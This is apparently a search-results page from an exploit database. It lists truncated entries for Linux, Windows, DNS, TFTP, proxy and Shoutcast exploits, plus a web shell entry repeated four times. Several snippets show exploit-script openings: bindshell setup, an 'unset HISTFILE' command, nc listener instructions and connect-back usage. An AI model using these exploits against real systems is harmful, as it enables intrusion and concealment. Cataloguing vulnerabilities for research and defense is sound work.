33 matches found
Linux kernel __sock_diag_rcv_msg Netlink message privilege elevation
Added: 05/13/2014 CVE: CVE-2013-1763 BID: 58137 OSVDB: 90604 Background Netlink is a feature of the Linux kernel which allows communication between kernel and user space. Problem An array index error in the sockdiagrcvmsg function in the Linux kernel allows local users to gain root privileges by...
haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (SEH)
!/usr/bin/python Exploit Title: haneWIN DNS Server SEH Author: Dario Estrada dash https://intrusionlabs.org Date: 2014-01-29 Version: haneWIN DNS Server 1.5.3 Vendor Homepage: http://www.hanewin.net/ Vulnerable app link:http://www.hanewin.net/dns-e.htm Tested on: Windows XP SP3 Thanks to God, to ...
Microsoft Office PowerPoint Viewer TextBytesAtom Record Buffer Overflow
Added: 03/04/2010 CVE: CVE-2010-0033 BID: 38107 OSVDB: 62241 Background Microsoft PowerPoint Viewer 2003 is a free tool which allows viewing of Microsoft PowerPoint presentations without requiring Microsoft PowerPoint itself. Problem A stack overflow vulnerability in the handling of TextBytesAtom...
linux rally the shell-vulnerability warning-the black bar safety net
include include include include include include include void usage; char shell="/bin/sh"; char message="s8s8 welcome\n"; int sock; int mainint argc, char argv ifargc \n", prog; exit-1; gcc-o f f. c Then on the machine listening on a port nc-l-p 8 8 8 8 Then execute./ f 192.168.1.14 8 8 8 8 Note:...
ASPX Shell
Added: 02/14/2008 Background This exploit does not exploit a vulnerability, but instead creates an aspx page. The page, if placed on an IIS server, establishes a shell connection when requested. Problem N/A Resolution N/A References N/A Limitations The user needs the ability to upload the resulti...
ASPX Shell
Added: 02/14/2008 Background This exploit does not exploit a vulnerability, but instead creates an aspx page. The page, if placed on an IIS server, establishes a shell connection when requested. Problem N/A Resolution N/A References N/A Limitations The user needs the ability to upload the resulti...
ASPX Shell
Added: 02/14/2008 Background This exploit does not exploit a vulnerability, but instead creates an aspx page. The page, if placed on an IIS server, establishes a shell connection when requested. Problem N/A Resolution N/A References N/A Limitations The user needs the ability to upload the resulti...
ASPX Shell
Added: 02/14/2008 Background This exploit does not exploit a vulnerability, but instead creates an aspx page. The page, if placed on an IIS server, establishes a shell connection when requested. Problem N/A Resolution N/A References N/A Limitations The user needs the ability to upload the resulti...
3proxy 0.5.3g proxy.c logurl() Remote Overflow Exploit (exec-shield)
No description provided by source. / Fedora Core 5,6 exec-shield based 3proxy HTTP Proxy 3proxy-0.5.3g.tgz remote overflow root exploit reverse connect-back method by Xpl017Elz Advanced exploitation in exec-shield Fedora Core case study URL:...
FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
No description provided by source. !/usr/bin/perl =============================================================================================== FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit By Umesh Wanve...
SHOUTcast 1.9.4 - File Request 'Leaked' Format String
/ Shoutcast include include include include include include include include include include include define SHELLPORT 7000 define SHELLCOMMAND "unset HISTFILE; uname -a; id;" if 1 unsigned char shellcode = / bindshell 7000 Unknown /...
Citadel/UX 6.27 - Format String
/ citadelfsexp.c Citadel/UX v6.27 remote format string exploit Use: ./citadelfsexp -h options options: -h host or IP -t type of target system -l targets list -g syslog GOT address -r RET address coki@nosystem:/audit$ ./citadelfsexp -h localhost -t0 Citadel/UX v6.27 remote format string exploit by...
Microsoft Windows XP - Workstation Service Remote (MS03-049)
/ To build new netapi32.lib pedump /exp netapi32.dll netapi32.exp buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll d:\rpcwksbo.exe WKS service remote exploit MS03-049 by fiNis fiNisatbkdotru, ver:0.1.1 ------------------------------------------------------------------- Usage:...